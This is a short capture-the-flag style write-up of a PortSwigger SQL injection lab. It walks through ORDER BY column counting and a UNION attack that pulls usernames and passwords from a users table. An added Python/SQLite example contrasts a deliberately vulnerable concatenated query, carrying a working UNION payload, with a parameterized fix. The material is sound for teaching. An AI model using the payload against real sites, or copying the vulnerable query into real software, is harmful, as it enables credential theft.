Portswigger SQLi-Lab 3

ARZ101
3 min read · Jun 4, 2021

Hello everyone, in this post I will be sharing my solution for PortSwigger SQLi lab #3, so without further ado let's jump in.

SQL injection UNION attack, retrieving data from other tables

This lab is a continuation of the previous SQLi labs. Here we have to retrieve the data from the users table, which has columns named username and password, knowing that the GET parameter category is vulnerable to SQLi. Since the tables have changed, we may have to find the number of columns again with an "ORDER BY" query.

Trying to find the number of columns using ORDER BY

So the query returns only 2 columns

Since we know the table name, we can grab data from it using the column names, which are also known

With this we can grab the usernames and passwords from the table

Now, in order to complete this lab we need to log in as administrator. Since we have his password, we just need to log in, so going to My Account

And we are done with this lab!
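Why the UNION on the category parameter returns rows from users, and what stops it, shown as an added example that is not part of the original post or the lab's code. It assumes an in-memory SQLite stand-in; the products table, its columns and all row values are constructed.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the lab's database: a products table behind
    # the category filter and the users table named in the lab description.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (name TEXT, description TEXT, category TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products VALUES ('Mug', 'Ceramic mug', 'Gifts');
        INSERT INTO products VALUES ('Lamp', 'Desk lamp', 'Lighting');
        INSERT INTO users VALUES ('administrator', 'constructed-secret');
        INSERT INTO users VALUES ('testuser', 'constructed-value');
    """)
    return db

def list_vulnerable(db, category):
    # Weak form: the parameter is concatenated into the SQL text, so a quote
    # inside it closes the string literal and the remainder is parsed as SQL.
    sql = ("SELECT name, description FROM products "
           "WHERE category = '" + category + "'")
    return db.execute(sql).fetchall()

def list_parameterized(db, category):
    # Hardened form: the value is bound as data and is only ever compared
    # with the category column.
    sql = "SELECT name, description FROM products WHERE category = ?"
    return db.execute(sql, (category,)).fetchall()

def order_by_accepted(db, n):
    # The column-count step: ORDER BY n is accepted only while n does not
    # exceed the number of columns in the original SELECT.
    try:
        list_vulnerable(db, "Gifts' ORDER BY %d--" % n)
        return True
    except sqlite3.OperationalError:
        return False

# Constructed input of the kind the lab describes for the category parameter.
UNION_INPUT = "Gifts' UNION SELECT username, password FROM users--"

if __name__ == "__main__":
    db = make_db()
    print([n for n in (1, 2, 3) if order_by_accepted(db, n)])
    print(list_vulnerable(db, UNION_INPUT))
    print(list_parameterized(db, UNION_INPUT))
    print(list_parameterized(db, "Gifts"))
```

With the bound parameter the whole input is treated as a category name that matches no product, so the users rows never reach the response.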
